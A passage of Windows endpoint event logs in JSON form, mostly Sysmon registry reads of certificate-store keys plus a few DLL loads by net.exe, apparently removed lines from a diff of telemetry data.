"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - 
"registry_value": "Software Publishing", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "davclnt.dll", - "image_path": "C:\\Windows\\System32\\davclnt.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "davhlpr.dll", - "image_path": "C:\\Windows\\System32\\davhlpr.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "cscapi.dll", - "image_path": "C:\\Windows\\System32\\cscapi.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 